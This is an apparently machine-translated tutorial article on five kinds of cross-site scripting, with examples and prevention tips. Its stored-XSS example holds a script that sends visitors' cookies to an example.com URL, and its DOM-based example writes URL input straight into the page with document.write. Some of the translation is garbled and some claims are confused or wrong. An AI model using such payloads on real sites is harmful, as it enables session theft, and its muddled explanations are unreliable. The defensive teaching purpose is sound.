For other translations of this series, see [JS Working Mechanism – Xiaobai’s 1991 column – Nuggets (juejin. Cn)] (juejin.cn/column/6988… Reading Index :5 This article is not very informative and easy to understand. It is highly recommended. If you want to deepen your understanding of XSS, you can read this article by He Shijun

An overview of the

Cross-site scripting (XSS) is an attack on browser-side code injection classes. An attacker injects Trojan code into an application and executes it in a specific scenario.

Like a browser, the attacker would inject code into a Web application that the victim was using. In general, XSS attacks are caused by excessive trust in the web application being used.

JS is an operating system that runs in a restricted environment and cannot access users. Therefore, XSS attacks do not damage the victim’s computer. XSS attacks are often aimed at stealing private information.

There are five main types of XSS attacks

Stored XSS

Stored XSS attacks can occur when web applications store user input. Without data validation on both the front end and back end before data miasma persists, serious vulnerabilities can develop. If an application loads stored data and emashes it into an HTML response page, code injection becomes an opportunity.

Such attacks are rare because they are now rare and hard to find.

On the other hand, the impact of XSS attacks can be significant. Once the Trojan data exists in the service, it can be used by the intended user. The user doesn’t have to do anything – click on a suspicious link, for example – for the Trojan to be embedded in your app.

A stored XSS attack requires two requests:

1. A request to inject and save the Trojan horse to the application server

  1. A request is made to load the stored Trojan and embed it in the published HTML page

Sites that allow users to share content are more vulnerable to stored XSS attacks. Such as social networking sites and forums.

Example

The attacker found a flaw in the social network’s ability to post comments. The bug is a site page that renders the unprocessed content of a comment.

This allows an attacker to add such a custom script to a comment

<script> window.location = ‘https://example.com/?user_data=’ + document.cookies; </script>
Copy the code

Once the site loads the comment, the script tag is added to the HTMl page. The user’s URL is then redirected to the Trojan site and all cookies are sent through the query parameters of the URL. Trojan sites steal cookies and private data.

Because many people can read your comments, they can be attacked.

This is a crude case, we don’t want any social networking sites to have such low-level vulnerabilities, it is simply used to illustrate stored XSS attacks.

The prevention of

The most effective way to prevent stored XSS is to ensure that all user input is pure before saving.

String checking and escaping are generally used to keep content harmless.

Reflective XSS

Reflective XSS can occur when data sent by the browser to the server is sent back by the server package in response

This attack is called reflection because Trojan scripts are reflected from web applications to the victim’s browser.

The script is triggered by a link that sends a request to the Web application that carries a vulnerability capable of executing a malicious script.

Unlike stored XSS, reflective XSS code is not stored on the server; it only requires the malicious script to be embedded in the URL.

Stored XSS automatically attacks all users who visit a page, while reflective attacks only end users who click on a malicious link

Example

If you have a search function now, it works like this:

  • The user entered a search keyword
  • The Web application takes the keyword as a query parameter and redirects the user to the results page
  • The keyword is passed to the server for query
  • After the query completes, the server responds to the page. The response content contains the search keywords, as well as the matching results.

If the user enters “javascript”, it is redirected to the following page:

https://example.com/search/?term=javascript

After the query, the page renders the server’s response:

<div> You searched for: javascript </div> <div> Results: </div>...Copy the code

If the Web application does not perform any processing or validation on the search keyword, an attacker can implant malicious code in the keyword:

<script>/*Malicious code*/</script>
Copy the code

The resulting URL would look like this:

https://example.com/search/?term=<script>/*+Malicious+code+*/</script>

Page rendering:

<div> You searched for: <script>/*Malicious code*/</script> </div> <div> Results: </div>...Copy the code

If this URL is propagated to other users, the attacker’s script will be executed in their browser.

There are many ways to spread a malicious URL, including placing it on a site controlled by an attacker, or allowing content to be generated, sending it by email, and so on. This attack can be targeted at a subset of the population or at any user without distinction

The prevention of

By being vigilant, you can prevent reflexive XSS. In particular, don’t click on suspicious connections. As with stored XSS, you can prevent reflective XSS by keeping user input pure

Self-XSS

Self-xss is somewhat similar to reflection XSS. The difference is that self-xSS cannot be triggered by a particular URL. Self-xss can only be triggered by the victim in their own browser.

That doesn’t sound so dangerous. But that’s not the case. Self-xss spreads through social engineering. In the context of information security, social engineering refers to the mind control of people who perform operations that have potentially negative effects on the population.

Example

One common way to do this is to have the victim paste some malicious code into the browser console. So the attacker can get all the information from cookies, DOM.

The prevention of

Self-xss can only be prevented by user vigilance. There is no way for developers to detect or block code executing in the browser console. Some popular web sites place a warning message on the browser console to prevent the user from executing code there.

Browser vendors are also taking security measures to warn users of the risk of self-XSS attacks

DOM-based XSS

Dom-based XSS attacks may occur when a Web application dynamically modifies the DOM. Malicious code is injected by the application itself at runtime. To trigger DOM-based XSS, the SITE’s JS code needs to take input from resources controlled by the attacker, such as a URL in a browser

Example

Look at the following example

<html> 

<head>                                                                    
  <title> Dashboard </title>                                                
</head>                                                                   
<body>                                                                    
 <script>                                                                  
    let startPosition = document.URL.indexOf("role=") + 5;                    
    let userRole = document.URL.substring(startPosition,document.URL.length); 
    document.write(userRole);                                                 
 </script>                                                                 
 </body>                                                                   
</html>
Copy the code

The script on the page takes the value from the role parameter and inserts it into the DOM.

An attacker can set the query parameters to malicious code, which is then injected into the DOM

https://example.com/?role=<script>/*Malicious+code*/</script>

In this case, although the Web application is vulnerable to this attack, the server can detect it because it is part of the requested URL. If the server has a security mechanism, you can avoid this kind of attack.

You can use the URL fragment technique to prevent it from being sent to the server. The URL fragment is the content after the # symbol in the URL and is not sent to the server. In this case, you can modify the above URL:

https://example.com/#role=<script>/*Malicious+code*/</script>

This way, the malicious script will not be sent to the browser.

The prevention of

All DOM operations and redirects that rely on user input should be purged. And it should be the client that does the cleaning, because DOM-based XSS cannot be disabled on the server

Of course, user vigilance is essential. When users click on a URL or enter data, they should be wary of malicious code

Blind XSS

Blind XSS is a type of storage XSS. They do it the same way.

The difference is that the malicious code is rendered and executed in another part of the application, or in a completely different application. In neither case does the attacker visit the victim page.

Example

An example of Blind XSS is where an attacker injects malicious code into a user feedback page. When the application manager opens the feedback control panel, the malicious code executes.

The attacker’s malicious code can be stored on the server, no matter how long it takes, and executed whenever an administrator accesses the control panel page.

Another scenario is logging, such as exception handling logs. The attacker uses the logging API to output malicious code instead of an exception. In the control panel for exception handling cases, malicious code is rendered and executed.

Prevention

Blind XSS is protected in the same way as storage XSS.